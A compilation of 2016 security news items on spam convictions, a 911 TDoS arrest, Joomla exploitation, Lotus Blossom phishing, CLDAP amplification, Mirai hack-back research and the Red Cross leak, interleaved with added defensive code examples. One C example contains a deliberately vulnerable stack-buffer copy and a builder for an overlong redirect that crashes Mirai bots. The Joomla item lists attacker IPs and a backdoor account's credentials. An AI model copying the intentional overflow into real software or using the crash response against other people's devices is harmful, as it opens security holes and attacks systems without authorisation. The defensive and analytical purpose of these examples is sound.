“Defendant TIMOTHY LIVINGSTON, a/k/a “Mark Loyd,” resided in or around Fort Lauderdale, Florida, and was the sole owner of A Whole Lot of Nothing LLC (“AWLN”), a company that sent unsolicited emails in bulk (or “spam”) on behalf of its customers for a fee. Defendant LIVINGSTON was the organizer and leader of the computer hacking and illegal spamming schemes described herein.” reads the court documents.
Livingston admitted hiring the developer Tomasz Chmielarz (33) to write spamming code that evaded spam filters. Chmielarz in fact did much more: he also hacked into corporate servers and used them to power the spamming campaigns.
“Defendant TOMASZ CHMIELARZ resided in or around Clifton, New Jersey, and was a computer programmer. Among other things, defendant CHMIELARZ authored the hacking tools and other programs used to facilitate the computer hacking and illegal spamming schemes described herein.” continues the court documents.
When law enforcement arrested Livingston, they found a database of more than 50 million email addresses used for the spamming campaigns.
There is also a third person in the story, Devin James McArthur, who worked for Comcast and added more than 24.5 million email addresses taken from his employer to the spam archive.
McArthur worked with the other two to collect more data from other companies; Chmielarz and McArthur pleaded guilty in June.
According to the Department of Justice (DoJ), Livingston has agreed to return illicit funds earned by his company in spamming campaigns.
“In connection with his plea agreement, Livingston consented to the entry of a forfeiture money judgment in the amount of $1,346,442, as well as the forfeiture of property obtained using illegal proceeds from the scheme, including a 2009 Cadillac Escalade and a 2006 Ferrari F430 Spider.” reported the DoJ.
The goods confiscated from Livingston include the 2009 Cadillac Escalade and the 2006 Ferrari F430 Spider named in the forfeiture.
Do you still think that spam is not very profitable?
Young hacker arrested for disrupting 911 Service with a TDoS attack
31.10.2016 securityaffairs Crime
An 18-year-old man from Arizona, Meetkumar Hiteshbhai Desai, was arrested this week on suspicion of causing a severe disruption of 911 service.
A few weeks ago, a group of researchers from Ben-Gurion University of the Negev’s Cyber-Security Research Center demonstrated how it is possible to significantly disrupt the US’ 911 emergency call system.
An attacker could use a botnet of compromised mobile devices located throughout the country to knock the 911 service offline across an entire state for days.
Alternatively, attackers could lure thousands of smartphone users to a malicious web page that makes their devices dial 911 repeatedly, powering a massive TDoS (telephony denial of service) attack.
Such attacks are very dangerous for the population because they interrupt an emergency public service.
The news of the day is that an 18-year-old man from Arizona, Meetkumar Hiteshbhai Desai, was arrested this week on suspicion of causing a severe disruption of 911 service.
The youngster used one of his iOS exploits, delivered through a web link, to manipulate the devices of the users who visited the page.
“Surprise PD had believed that the calls were coming from smart phones and tablets. A link through Twitter was believed to be the cause of people’s phones dialing 911 over and over and not allowing them to hang up. Cyber Crimes Detectives found a Twitter account with about 12,000 followers which encouraged followers to click on the link to see the latest post” reads a press release from the Cyber Crimes Unit of Maricopa County Sheriff’s Office.
“This webpage domain was hosted out of San Francisco, California and ultimately sheriff’s detectives were able to shut it down to stop the potential immediate threat to the 911 emergency systems which could have possibly been compromised if enough users had clicked on the link.”
After being notified of the disruption to 911 service in the Phoenix area, the police immediately launched an investigation, monitored Desai’s online activity and discovered how he had powered the attack against the 911 service.
When Desai was arrested, he told Sheriff’s detectives that he had been looking for bugs and malware that could be used to hack into Apple smartphones, with an eye on the company’s bug bounty program.
Desai explained that he meant to upload a script that simply displayed pop-ups and caused iOS devices to reboot, but mistakenly published the link to a version that forced iOS devices to dial 911 and hang up continually.
Desai created several exploits for the flaw he found, then he shared a link to one of his JavaScript exploits on his Twitter account and other websites.
Mobile users clicking on the link triggered the exploit, and their devices started calling 911 non-stop; in this way the 911 call center was flooded with more than 100 hang-up calls in a few minutes earlier this week.
Desai risks fifteen years in prison, five years per Class 2 Felony count.
Massive hacking campaign on Joomla sites via recently patched flaws
31.10.2016 securityaffairs Vulnerability
Experts from the firm Sucuri observed a spike in the number of attacks less than 24 hours after Joomla released patches for two critical flaws.
On October 25, Joomla released the version 3.6.4 to fix two high severity vulnerabilities, CVE-2016-8870, and CVE-2016-8869.
The first flaw, tracked as CVE-2016-8870, could be exploited by attackers to create user accounts even if account registration is disabled, while the second, tracked as CVE-2016-8869, allows a user registering on a website to obtain elevated privileges.
A combination of these flaws can be exploited to upload a backdoor and gain complete control of vulnerable Joomla websites.
Every time a flaw is publicly disclosed, it is a race between website administrators and hackers scanning the web for vulnerable Joomla versions.
It is quite easy to locate vulnerable versions exposed online, so experts at Sucuri monitored attack attempts against vulnerable Joomla versions in the wild.
The data collected by Sucuri speaks for itself: the number of attacks rose sharply shortly after Joomla released the patches. The experts observed attacks launched within 24 hours against some of the most popular Joomla websites.
The researchers discovered a first mass hacking campaign originating from three IP addresses in Romania; the hackers attempted to create an account with the username “db_cfg” and the password “fsugmze3” on thousands of Joomla sites. Below are the three IP addresses used by the attackers.
82.76.195.141
82.77.15.204
81.196.107.174
Sucuri also detected another IP address from Latvia used to attack the Joomla websites.
“They were the ones doing this initial mass exploitation campaign. Shortly after, another IP address from Latvia started a similar mass exploit campaign trying to register random usernames and passwords on thousands of Joomla sites.” reads the analysis published by Sucuri.
Obviously, the number of attacks increased in a significant way after the experts started sharing exploits.
“After these initial mass exploits, multiple researchers and security professionals started to share different exploits for this attack. Some of them are even automating the upload of backdoors and using some unique techniques to bypass the media uploader (using .pht files).” continues Sucuri.
“That led to a massive increase in IP addresses trying to exploit this vulnerability using different patterns and techniques.”
On October 28, the number of exploitation attempts observed by Sucuri peaked at 27,751, and of course the real figure is likely to be greater.
It is important to apply the updates to Joomla websites to secure them; administrators are also urged to check their logs for activity from the IP addresses shared by Sucuri and to watch for the creation of suspicious admin accounts.
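The log and account review recommended above can be scripted. The Python below is an added example (not Sucuri's or Joomla's code) that scans combined-format web server log lines for the registration POST the exploits use, scores hits against the three IPs above, flags self-registration on a site where registration is supposed to be disabled, and correlates a registration with a media upload from the same IP shortly afterwards, the sequence that ends in a dropped backdoor. The AUDIT_SQL string is the database-side check for freshly registered accounts in the Administrator and Super Users groups. Assumptions: the sample log lines are constructed, the default Joomla group ids 7 and 8, the #__ table prefix placeholder, and the 30-minute correlation window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Source IPs Sucuri attributed to the first mass-exploitation wave (from the article).
SUCURI_IOCS = {"82.76.195.141", "82.77.15.204", "81.196.107.174"}

# Constructed Apache/nginx combined-format lines (not real logs). 203.0.113.5 is
# an ordinary visitor; 198.51.100.7 self-registers and uploads a file minutes later.
SAMPLE_LOG = """\
82.76.195.141 - - [25/Oct/2016:14:02:11 +0000] "POST /index.php?option=com_users&task=user.register HTTP/1.1" 303 - "-" "Mozilla/5.0"
203.0.113.5 - - [25/Oct/2016:14:05:01 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 5320 "-" "Mozilla/5.0"
81.196.107.174 - - [25/Oct/2016:14:06:40 +0000] "POST /index.php/component/users/?task=user.register HTTP/1.1" 303 - "-" "python-requests/2.9"
198.51.100.7 - - [28/Oct/2016:09:10:00 +0000] "POST /index.php?option=com_users&task=user.register HTTP/1.1" 303 - "-" "curl/7.47.0"
198.51.100.7 - - [28/Oct/2016:09:14:30 +0000] "POST /index.php?option=com_media&task=file.upload&tmpl=component HTTP/1.1" 200 412 "-" "curl/7.47.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Database side of the check. Assumed default Joomla group ids: 7 = Administrator,
# 8 = Super Users; replace the #__ placeholder with the site's real table prefix.
AUDIT_SQL = """
SELECT u.id, u.username, u.email, u.registerDate, m.group_id
FROM #__users u
JOIN #__user_usergroup_map m ON m.user_id = u.id
WHERE m.group_id IN (7, 8) AND u.registerDate >= '2016-10-25'
ORDER BY u.registerDate;
"""


def parse_line(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["ts"] = datetime.strptime(req["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return req


def is_registration(req) -> bool:
    # Both URL forms reach the same registration controller task.
    return req["method"] == "POST" and "task=user.register" in req["path"]


def is_media_upload(req) -> bool:
    return (req["method"] == "POST" and "option=com_media" in req["path"]
            and "task=file.upload" in req["path"])


def audit(lines, registration_enabled=False, upload_window=timedelta(minutes=30)):
    """Return {ip: [reasons]} for requests that deserve a closer look."""
    reqs = [r for r in map(parse_line, lines) if r]
    findings = defaultdict(list)
    reg_times = defaultdict(list)
    for r in reqs:
        if not is_registration(r):
            continue
        reg_times[r["ip"]].append(r["ts"])
        if r["ip"] in SUCURI_IOCS:
            findings[r["ip"]].append("registration POST from IP in Sucuri's IOC list")
        elif not registration_enabled:
            findings[r["ip"]].append("registration POST although registration is disabled (CVE-2016-8870 pattern)")
    for r in reqs:
        if not is_media_upload(r):
            continue
        if any(timedelta(0) <= r["ts"] - t <= upload_window for t in reg_times.get(r["ip"], [])):
            findings[r["ip"]].append("media upload shortly after self-registration (possible backdoor drop)")
    return dict(findings)


if __name__ == "__main__":
    for ip, reasons in audit(SAMPLE_LOG.splitlines()).items():
        print(ip)
        for reason in reasons:
            print("   -", reason)
    print("Then run against the database:", AUDIT_SQL)
```

On a site where registration is legitimately enabled, pass registration_enabled=True so that only the IOC matches and the registration-then-upload sequence are reported; a 303 on the registration POST alone is not proof of compromise, which is why the SQL query against the user group map is the check that settles it.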
Lotus Blossom Chinese cyberspies leverage on fake Conference Invites in the last campaign
31.10.2016 securityaffairs Cyber
The Chinese APT Lotus Blossom is trying to lure victims with fake invitations to Palo Alto Networks’ upcoming Cybersecurity Summit.
Lotus Blossom, also known as Elise and Esile, is a Chinese APT behind a new cyber espionage campaign that uses fake invitations to Palo Alto Networks’ upcoming Cybersecurity Summit as a lure.
With this social engineering trick the attackers try to induce users to install a strain of malware that can be used to spy on the victims’ machines.
Security experts who have analyzed the activity of the Lotus Blossom APT believe it is a nation-state actor that has been active since at least 2012.
In June 2015, Trend Micro published a report on a targeted attack campaign of the group that hit organizations in various countries in the Southeast Asian region. The experts speculated the involvement of state-sponsored hackers due to the nature of the stolen information.
“The Esile targeted attack campaign targeting various countries in the Southeast Asian region has been discussed in the media recently. This campaign – which was referred to by other researchers as Lotus Blossom – is believed to be the work of a nation-state actor due to the nature of the stolen information, which is more valuable to countries than either private companies or cybercriminals.” wrote Trend Micro.
According to Trend Micro, other researchers have collected evidence suggesting that the group’s first activities date back to 2007.
Back to the present: the Lotus Blossom group launched a new espionage campaign using fake invitations to Palo Alto Networks’ Cybersecurity Summit, which will be held in Jakarta on November 3.
“Actors related to the Operation Lotus Blossom campaign continue their attack campaigns in the Asia Pacific region. It appears that these threat actors have begun using Palo Alto Networks upcoming Cyber Security Summit hosted on November 3, 2016 in Jakarta, Indonesia as a lure to compromise targeted individuals.” states the blog post published by Palo Alto Networks. “The payload installed in attacks using this lure is a variant of the Emissary Trojan that we have analyzed in the past, which has direct links to threat actors associated with Operation Lotus Blossom.”
Palo Alto Networks researchers observed that the cyberspies used the lure to deliver a new version of the Emissary Trojan.
The hackers ran a spear phishing campaign with emails carrying a Word document attachment titled “[FREE INVITATIONS] CyberSecurity Summit.doc.” The document, which contains an image taken from a previous invitation, attempts to exploit the old Microsoft Office vulnerability CVE-2012-0158 to deliver the malicious payload.
“As our readers and customers in Indonesia are likely recipients of this phishing e-mail, we want to release some key facts to clarify the situation.
The malicious email will have an attachment named “[FREE INVITATIONS] CyberSecurity Summit.doc” that if opened will exploit CVE-2012-0158. The legitimate invitation emails from Palo Alto Networks did not carry any attachments.
In response to this incident, we have halted our email invitations, so please disregard all new emails related to invitations to this conference, as it may be malicious.
Individuals wishing to attend the conference should register on our official CYBERSECURITY SUMMIT – JAKARTA website.”
Palo Alto Networks has stopped sending out email invitations because of the ongoing spear phishing campaign and is inviting users in Indonesia to ignore any message about the event received in these days.
The image was a screenshot of an older invitation that had been edited and cropped. Because the document still held the picture as it was before cropping, the researchers were able to recover the cropped-away area and extract information about the system used by the attackers.
“The information in the screenshot and an analysis of the document’s timestamp suggested that the user was located in China.” continues the report.
“The threat actor is running Windows localized for Chinese users, which suggests the actor’s primary language is Chinese. The ‘CH’ icon in the Windows tray shows that the built-in Windows input method editor (IME) is currently set to Chinese,” researchers explained. “Also, the screenshot shows a popular application in China called Sogou Pinyin, which is an IME that allows a user to type Chinese characters using Pinyin. Pinyin is critical to be able to type Chinese characters using a standard Latin alphabet keyboard, further suggesting the threat actor speaks Chinese.”
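Word's crop is non-destructive: the full picture stays in the file and only the crop geometry is recorded, which is what let the researchers see the attacker's taskbar. The Python below is an added example, not Palo Alto Networks' tooling, and it demonstrates the same recovery on the OOXML (.docx) container, where the media part is the untouched original and the crop lives in an a:srcRect element (values in thousandths of a percent); the page's sample was a binary .doc, so treating a .docx as the input is an assumption. build_sample_docx() constructs a minimal document in memory with a placeholder image so the script runs offline; on a real file you would write out the media part and open it in an image viewer.

```python
import hashlib
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespaces used by Word for embedded pictures.
A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"
PIC_NS = "http://schemas.openxmlformats.org/drawingml/2006/picture"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def build_sample_docx() -> bytes:
    """Constructed minimal .docx (not a real sample): one embedded picture whose
    displayed area is cropped via a:srcRect (10% left, 45% right, 20% bottom)."""
    document_xml = (
        f'<w:document xmlns:w="{W_NS}" xmlns:a="{A_NS}" xmlns:pic="{PIC_NS}" xmlns:r="{R_NS}">'
        "<w:body><w:p><w:r><w:drawing><pic:pic><pic:blipFill>"
        '<a:blip r:embed="rId5"/><a:srcRect l="10000" t="0" r="45000" b="20000"/>'
        "</pic:blipFill></pic:pic></w:drawing></w:r></w:p></w:body></w:document>"
    )
    rels_xml = (
        f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId5" '
        f'Type="{R_NS}/image" Target="media/image1.png"/></Relationships>'
    )
    fake_png = b"\x89PNG\r\n\x1a\n" + b"constructed placeholder image bytes"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
        z.writestr("word/media/image1.png", fake_png)
    return buf.getvalue()


def visible_fraction(crop_pct: dict) -> float:
    """Fraction of the original image area that the document actually shows."""
    w = 1.0 - (crop_pct["l"] + crop_pct["r"]) / 100.0
    h = 1.0 - (crop_pct["t"] + crop_pct["b"]) / 100.0
    return max(w, 0.0) * max(h, 0.0)


def extract_images_with_crops(docx_bytes: bytes) -> list:
    """Pull every embedded picture out of a .docx together with its crop
    rectangle. The media part is the full original image; only the crop
    geometry lives in document.xml, so cropped-away pixels are recoverable."""
    results = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        rels = ET.fromstring(z.read("word/_rels/document.xml.rels"))
        targets = {r.get("Id"): r.get("Target") for r in rels}
        doc = ET.fromstring(z.read("word/document.xml"))
        for fill in doc.iter(f"{{{PIC_NS}}}blipFill"):
            blip = fill.find(f"{{{A_NS}}}blip")
            rect = fill.find(f"{{{A_NS}}}srcRect")
            if blip is None:
                continue
            target = targets.get(blip.get(f"{{{R_NS}}}embed"))
            if target is None:
                continue
            data = z.read("word/" + target)
            crop = None
            if rect is not None:
                crop = {k: int(rect.get(k, "0")) / 1000.0 for k in ("l", "t", "r", "b")}
            results.append({
                "file": target,
                "bytes": len(data),
                "sha256": hashlib.sha256(data).hexdigest(),
                "crop_pct": crop,
                "hidden": crop is not None and visible_fraction(crop) < 1.0,
            })
    return results


if __name__ == "__main__":
    for item in extract_images_with_crops(build_sample_docx()):
        print(item["file"], item["sha256"][:16], "crop:", item["crop_pct"],
              "hidden content:", item["hidden"])
```

A "hidden" hit with a low visible fraction is the cue to look at the raw media file: in the sample, 64% of the picture is never rendered by Word but is still sitting in word/media. The same reasoning applies to the legacy .doc format, where the picture data is stored whole in the document's data stream.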
Teenage Hacker Arrested For Disrupting 911 Service With DDoS Attack
30.10.2016 thehackernews Attack
Just last month, researchers explained how an attacker could knock the 911 service offline across an entire state by launching automated Distributed Denial of Service (DDoS) attacks with a botnet of just 6,000 smartphones.
But doing so in reality endangers not only the public but the attacker as well.
That is what happened to an 18-year-old from Arizona, who was arrested this week following a severe disruption of 911 emergency systems caused by one of his iOS exploits.
Meetkumar Hiteshbhai Desai discovered an iOS vulnerability that could be exploited to manipulate devices, including trigger pop-ups, open email, and abuse phone features, according to a press release from the Cyber Crimes Unit of Maricopa County Sheriff's Office.
In order to prove the flaw, Desai allegedly created several exploits and posted a link to one of his JavaScript exploits on his Twitter account and other websites.
People accessing the exploit link from their iPhones and iPads were forced to call 911 non-stop, which flooded a 911 call center with more than 100 hang-up calls within a "matter of minutes" earlier this week.
After being notified of disruption to the 911 service around the Phoenix, Arizona, area, investigators immediately launched an investigation and traced the Twitter link back to a web page registered to 'Meet Desai.'
The authorities identified Desai as the possible suspect behind the attack against the 911 service and took him into custody late Wednesday.
On his part, Desai claimed he just meant to upload a script that simply displayed pop-ups and caused iOS devices to reboot, but he mistakenly published a link to an exploit that caused iOS devices to dial 911 and hang up continually.
According to authorities, Desai shared the iOS exploit on Twitter with his more than 12,000 followers, of whom 1,849 clicked on the link.
Maricopa officers arrested Desai, took him to jail and booked him on three counts of felony computer tampering charges, on Monday, October 24.
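Both accounts of the Desai case above describe the same signal a PSAP or carrier could alert on: a burst of near-zero-length calls to 911 from many distinct handsets within a few minutes, some of them redialing. The Python below is an added example (not the sheriff's, BGU's or any carrier's tooling) of a sliding-window TDoS detector over call detail records. The CDR format and the SAMPLE_CDR lines are constructed; the thresholds (10 hang-ups under 5 seconds from at least 8 numbers within 120 seconds) are assumptions to tune against real call volume. Requiring several distinct callers keeps one faulty handset from tripping it.

```python
from collections import deque
from datetime import datetime
import csv
import io

# Constructed call-detail records (not real PSAP data): two genuine calls,
# then a burst of near-zero-length calls to 911 from ten handsets, two of
# which redial, the pattern a "dial and hang up in a loop" page produces.
SAMPLE_CDR = """\
time,caller,callee,duration_s
2016-10-25T21:00:00,+14805550101,911,42
2016-10-25T21:02:10,+14805550102,911,180
2016-10-25T21:05:00,+14805550201,911,1
2016-10-25T21:05:05,+14805550202,911,0
2016-10-25T21:05:10,+14805550203,911,2
2016-10-25T21:05:15,+14805550204,911,1
2016-10-25T21:05:20,+14805550205,911,0
2016-10-25T21:05:25,+14805550206,911,1
2016-10-25T21:05:30,+14805550207,911,3
2016-10-25T21:05:35,+14805550208,911,0
2016-10-25T21:05:40,+14805550209,911,1
2016-10-25T21:05:45,+14805550210,911,0
2016-10-25T21:05:50,+14805550201,911,1
2016-10-25T21:05:55,+14805550202,911,0
2016-10-25T21:30:00,+14805550103,911,95
"""


def parse_cdr(text: str):
    """Yield CDR rows as dicts with a parsed datetime and integer duration."""
    for row in csv.DictReader(io.StringIO(text)):
        yield {
            "time": datetime.fromisoformat(row["time"]),
            "caller": row["caller"],
            "callee": row["callee"],
            "duration_s": int(row["duration_s"]),
        }


def detect_tdos(rows, target="911", window_s=120, min_calls=10,
                min_callers=8, max_duration_s=5):
    """Sliding-window detector: raise one alert per burst in which at least
    min_calls hang-ups (<= max_duration_s) to target arrive within window_s
    seconds from at least min_callers distinct numbers. The alert is extended,
    not duplicated, while the burst continues."""
    events = sorted(rows, key=lambda e: e["time"])
    window = deque()
    alerts, burst_open = [], False
    for ev in events:
        if ev["callee"] != target or ev["duration_s"] > max_duration_s:
            continue
        window.append(ev)
        while (ev["time"] - window[0]["time"]).total_seconds() > window_s:
            window.popleft()
        callers = {e["caller"] for e in window}
        hit = len(window) >= min_calls and len(callers) >= min_callers
        if hit and not burst_open:
            alerts.append({"start": window[0]["time"], "end": ev["time"],
                           "calls": len(window), "callers": len(callers)})
            burst_open = True
        elif hit:
            alerts[-1].update(end=ev["time"], calls=len(window), callers=len(callers))
        else:
            burst_open = False
    return alerts


if __name__ == "__main__":
    for a in detect_tdos(parse_cdr(SAMPLE_CDR)):
        print(f"TDoS burst {a['start']:%H:%M:%S}-{a['end']:%H:%M:%S}: "
              f"{a['calls']} hang-up calls from {a['callers']} numbers")
```

The genuine calls at the start and end of the sample never enter the window because of their duration, and the burst produces exactly one alert that grows as the redials arrive. In production the alert should carry the caller list so the carrier can identify the web page or app the affected handsets have in common.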
LDAP as attack vector could power Terabit-Scale LDAP DDoS Attacks
30.10.2016 securityaffairs Attack
Security experts observed attackers launching a powerful LDAP DDoS attack; the new amplification method could enable terabit-scale attacks.
LDAP DDoS attacks are a novelty in the threat landscape: the Lightweight Directory Access Protocol (LDAP) can be abused to power massive DDoS attacks.
LDAP is an open standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol (IP) network.
Experts at the DDoS mitigation provider Corero Network Security confirmed that an LDAP DDoS attack had already been observed in a live incident last week. Corero describes the vector as a zero-day; strictly speaking it is not a software bug but a reflection technique that abuses Connectionless LDAP (CLDAP), which runs over UDP and therefore answers queries carrying a spoofed source address. The experts believe it could become another option in the arsenal of attackers in the wild.
By abusing the protocol it is possible to obtain an amplification factor of 46x, which in specific conditions can peak at 55x.
Corero explained that the attacker sends a query, with the source address spoofed to the victim’s address, to a vulnerable reflector exposing the Connectionless LDAP (CLDAP) service.
The CLDAP service then sends its response to the spoofed address; the response is, of course, much larger than the original query.
“In this case, the attacker sends a simple query to a vulnerable reflector supporting the Connectionless LDAP service (CLDAP) and using address spoofing makes it appear to originate from the intended victim. The CLDAP service responds to the spoofed address, sending unwanted network traffic to the attacker’s intended target.” reads a blog post published by Corero.
“Amplification techniques allow bad actors to intensify the size of their attacks, because the responses generated by the LDAP servers are much larger than the attacker’s queries. In this case, the LDAP service responses are capable of reaching very high bandwidth and we have seen an average amplification factor of 46x and a peak of 55x.”
LDAP DDoS attacks could cause serious damage; the experts believe they could peak at tens of terabits per second of traffic.
“When combined with other methods, particularly IoT botnets, we could soon see attacks reaching previously unimaginable scale, with far-reaching impact. Terabit scale attacks could soon become a common reality and could significantly impact the availability of the Internet– at least degrading it in certain regions,” said Dave Larson, CTO/COO at Corero Network Security.
Hacking back the Mirai botnet, technical and legal issues
30.10.2016 securityaffairs BotNet
Security researchers have found vulnerabilities in the source code of the Mirai botnet and devised a method to hack it back.
The Mirai botnet is a name familiar to security experts because of the massive DDoS attack it powered against the Dyn DNS service a few days ago.
The Mirai malware was first spotted by the researcher MalwareMustDie, who confirmed it was designed to hack into poorly configured and vulnerable IoT devices. Its source code was leaked on the criminal hacker forum Hackforums by a user with the moniker “Anna-senpai”, giving anyone the opportunity to compile and customize their own version of the threat.
Experts who reviewed the code discovered a weakness that could be exploited to stop a bot from flooding its target with HTTP requests, which means it is possible to hack back the threat. The experts at Invincea found three vulnerabilities in the Mirai code; one of them, a stack buffer overflow, can be exploited to halt the HTTP flood attack powered by the botnet. The overflow lies in the way Mirai parses the HTTP responses it receives during the flood.
“Perhaps the most significant finding is a stack buffer overflow vulnerability in the HTTP flood attack code. When exploited it will cause a segmentation fault (i.e. SIGSEGV) to occur, crash the process, and therefore terminate the attack from that bot. The vulnerable code has to do with how Mirai processes the HTTP location header that may be part of the HTTP response sent from an HTTP flood request.” reported the analysis published by the security firm Invincea.
The researchers highlighted that their attack would not have helped against the DNS-based DDoS attack on Dyn, but it does halt the Layer 7 attack capability of the Mirai botnet as implemented in the code leaked online.
The researchers at Invincea successfully tested a proof-of-concept exploit in a virtual environment, setting up a debug instance of the Mirai bot, a command and control server and a target machine.
“This simple “exploit” is an example of active defense against an IoT botnet that could be used by any DDoS mitigation service to defend against a Mirai-based HTTP flood attack in real-time. While it can’t be used to remove the bot from the IoT device, it can be used to halt the attack originating from that particular device. Unfortunately, it’s specific to the HTTP flood attack, so it would not help mitigate the recent DNS-based DDoS attack that rendered many websites inaccessible.” explained Scott Tenaglia, Research Director in the cyber capabilities team at Invincea Labs.
Tenaglia remarked that the method does not clean the compromised devices; it is effective only against HTTP flooding powered by the Mirai botnet.
The method proposed by the researchers is a form of active defense with important legal implications: whoever defends a system this way is launching a counter-attack against the attacker’s infrastructure, even though that infrastructure is somebody else’s compromised device.
In the United States, hacking back is illegal under the Computer Fraud and Abuse Act.
Hacking a bot means gaining unauthorized access to a computer system, and such operations have to be authorized by a court order.
Invincea has done excellent work and is not suggesting hacking back; it limited its analysis to the technical aspects of the Mirai botnet and its vulnerabilities.
“It’s in the gray space of active defense,” Tenaglia told ThreatPost. “In the defense world, this is a hotly contested issue. Say if your IoT is already compromised and bad code is already running, if I do something to the bad guy’s code, am I breaking law?”
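The bug class Invincea describes, a redirect follower that trusts the length of an attacker-controlled Location header, is easiest to see beside its bounded form. The C below is an added example: it is neither Invincea's proof of concept nor code from the leaked Mirai source, and REDIR_BUF, find_location, follow_redirect_vuln, follow_redirect_safe and build_overlong_redirect are hypothetical names. follow_redirect_vuln copies the header value into a fixed stack buffer with no check, so a response whose Location exceeds the buffer smashes the stack; follow_redirect_safe rejects oversized values; build_overlong_redirect produces the kind of 302 a mitigation endpoint would hand back to a flooding bot.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Fixed stack buffer a naive redirect follower might use (assumed size). */
#define REDIR_BUF 64

/* Locate the value of the first "Location:" header (case-insensitive) in a
   raw HTTP response. Stores the value length in *len; returns NULL if absent. */
static const char *find_location(const char *resp, size_t resp_len, size_t *len)
{
    static const char needle[] = "\r\nLocation: ";
    const size_t nlen = sizeof(needle) - 1;
    for (size_t i = 0; i + nlen <= resp_len; i++) {
        if (strncasecmp(resp + i, needle, nlen) == 0) {
            const char *val = resp + i + nlen;
            size_t n = 0;
            while (val + n < resp + resp_len && val[n] != '\r' && val[n] != '\n')
                n++;
            *len = n;
            return val;
        }
    }
    return NULL;
}

/* VULNERABLE pattern (modelled on the flaw class, not Mirai's code): the value
   is copied with the attacker-controlled length into a fixed stack buffer.
   A Location longer than REDIR_BUF-1 bytes overflows it and crashes the bot. */
int follow_redirect_vuln(const char *resp, size_t resp_len, char *out, size_t out_len)
{
    char path[REDIR_BUF];
    size_t n;
    const char *val = find_location(resp, resp_len, &n);
    if (val == NULL)
        return 0;
    memcpy(path, val, n);              /* no check that n < sizeof(path) */
    path[n] = '\0';
    snprintf(out, out_len, "%s", path);
    return 1;
}

/* HARDENED version: bound the copy by the destination and refuse oversized
   values instead of silently truncating a URL. */
int follow_redirect_safe(const char *resp, size_t resp_len, char *out, size_t out_len)
{
    size_t n;
    const char *val = find_location(resp, resp_len, &n);
    if (val == NULL)
        return 0;
    if (n == 0 || n >= out_len)
        return -1;                     /* oversized or empty Location */
    memcpy(out, val, n);
    out[n] = '\0';
    return 1;
}

/* The response a mitigation endpoint could return to a flooding bot: a 302
   whose Location value is loc_len filler bytes. Returns bytes written, 0 if
   buf is too small. */
size_t build_overlong_redirect(char *buf, size_t buf_len, size_t loc_len)
{
    static const char head[] = "HTTP/1.1 302 Found\r\nLocation: ";
    static const char tail[] = "\r\nContent-Length: 0\r\n\r\n";
    size_t need = (sizeof(head) - 1) + loc_len + (sizeof(tail) - 1);
    if (need + 1 > buf_len)
        return 0;
    memcpy(buf, head, sizeof(head) - 1);
    memset(buf + sizeof(head) - 1, 'A', loc_len);
    memcpy(buf + sizeof(head) - 1 + loc_len, tail, sizeof(tail));  /* with NUL */
    return need;
}

/* Feed a loc_len-byte Location to the hardened parser; -2 if build fails. */
int hardened_result(size_t loc_len)
{
    char resp[2048], out[REDIR_BUF];
    size_t n = build_overlong_redirect(resp, sizeof resp, loc_len);
    return n ? follow_redirect_safe(resp, n, out, sizeof out) : -2;
}

/* 1 if the chosen parser extracts exactly `expect` from `resp`, else 0. */
int parses_to(const char *resp, const char *expect, int use_vuln)
{
    char out[REDIR_BUF];
    int rc = use_vuln ? follow_redirect_vuln(resp, strlen(resp), out, sizeof out)
                      : follow_redirect_safe(resp, strlen(resp), out, sizeof out);
    return rc == 1 && strcmp(out, expect) == 0;
}

int main(void)
{
    printf("hardened parser on a 512-byte Location: rc=%d (expect -1)\n",
           hardened_result(512));
    /* follow_redirect_vuln on the same response would overflow `path`. */
    return 0;
}
```

The legal point the article goes on to make applies exactly here: the overlong redirect is served only to clients that are already hammering the defender's own server, but it still deliberately crashes a process on somebody else's device.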
“I would never comment on the legality of this,” Tenaglia said. “I think this gives us another point to discuss with regard to active defense. Is this something we think is ok? I don’t think it would hurt the system; it might help it. If a bot is degrading performance of the Internet connection because of the packets it’s sending out, and if this attack kills the process and the connection gets better, have we helped you? That’s why this is a gray area.”
Red Cross Blood Service incident: Australia’s largest ever leak of personal data
30.10.2016 securityaffairs Incident
The Australian Red Cross Blood Service has confirmed a data leak that exposed a backup database containing the personal details of donors.
Security experts consider this one of the most severe leaks because of the nature of the target, the Australian Red Cross Blood Service. The database was discovered on October 24 by a security researcher who was scanning the Web for exposed web servers.
One of its third-party service providers inadvertently exposed a backup database containing the personal details of 550,000 individuals.
The database remained accessible online between September 5 and October 25.
The man who discovered the database reported it to the well-known security expert Troy Hunt, who runs the data breach notification service haveibeenpwned.com.
The 1.74 GB database contains 1.3 million records including donors’ names, gender, date of birth, country of birth, physical and email addresses, phone numbers, blood type, type of donation, donation dates, and eligibility questionnaire answers.
“In the Red Cross’ case, the data that was ultimately leaked was a database backup. That 1.74GB was simply a mysqldump file that had everything in it. Taking a database backup is not unusual (in fact it’s pretty essential for disaster recovery), it’s what happened next that was the problem.” wrote Troy Hunt in a blog post.
“The database backup was published to a publicly facing website. This is really the heart of the problem because no way, no how should that ever happen. There is no good reason to place database backups on a website, let alone a publicly facing one. There are many bad reasons (usually related to convenience), but no good ones.”
Hunt reported the issue to the Red Cross and AusCERT; meanwhile, the Australian Red Cross Blood Service reported the incident to the Australian Cyber Security Centre, the Federal Police and the Office of the Australian Information Commissioner.
